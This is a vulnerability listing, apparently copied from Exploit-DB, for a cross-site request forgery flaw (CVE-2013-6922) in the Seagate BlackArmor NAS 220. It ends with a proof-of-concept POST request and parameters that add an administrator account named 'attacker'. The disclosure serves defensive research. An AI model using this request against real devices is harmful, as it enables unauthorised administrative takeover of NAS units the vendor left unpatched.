Seagate BlackArmor NAS - Cross Site Request Forgery

vendor:

BlackArmor NAS 220

by:

Jeroen - IT Nerdbox

7,5

CVSS

HIGH

Cross Site Request Forgery

352

CWE

Product Name: BlackArmor NAS 220

Affected Version From: sg2000-2000.1331

Affected Version To: sg2000-2000.1331

Patch Exists: NO

Related CWE: CVE-2013-6922

CPE: h:seagate:blackarmor_nas_220

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2014

Seagate BlackArmor NAS – Cross Site Request Forgery

There are multiple CSRF attacks possible, the proof of concept shows how it is possible to add a user with administrative privileges to the system. It is also possible to factory reset the device, reboot the device, add/edit/remove users, add/edit/remove shares and volumes.

Mitigation:

Implementing a secure authentication mechanism and validating user input can help mitigate the risk of CSRF attacks.

Source

Exploit-DB raw data:

# Exploit Title: Seagate BlackArmor NAS - Cross Site Request Forgery

# Google Dork: N/A

# Date: 04-01-2014

# Exploit Author: Jeroen - IT Nerdbox

# Vendor Homepage: http://www.seagate.com/

# Software Link:
http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/

# Version: sg2000-2000.1331

# Tested on: N/A

# CVE : CVE-2013-6922

#

## Description:

#

# There are multiple CSRF attacks possible, the proof of concept shows how
it is possible to add

# a user with administrative privileges to the system.
#
# It is also possible to:

# 

# 1. Factory reset the device

# 2. Reboot the device

# 3. Add/Edit/Remove users
# 4. Add/Edit/Remove shares and volumes

#
# This vulnerability was reported to Seagate in September 2013, they stated
that this will not be fixed. 

#

## Proof of Concept:

# 

# POST: http(s)://<url |
ip>/admin/access_control_user_add.php?lang=en&gi=a001&fbt=23
# Parameters:

#

# username attacker
# adminright yes
# fullname hacker
# userpasswd attackers_password
# userpasswdcheck attackers_password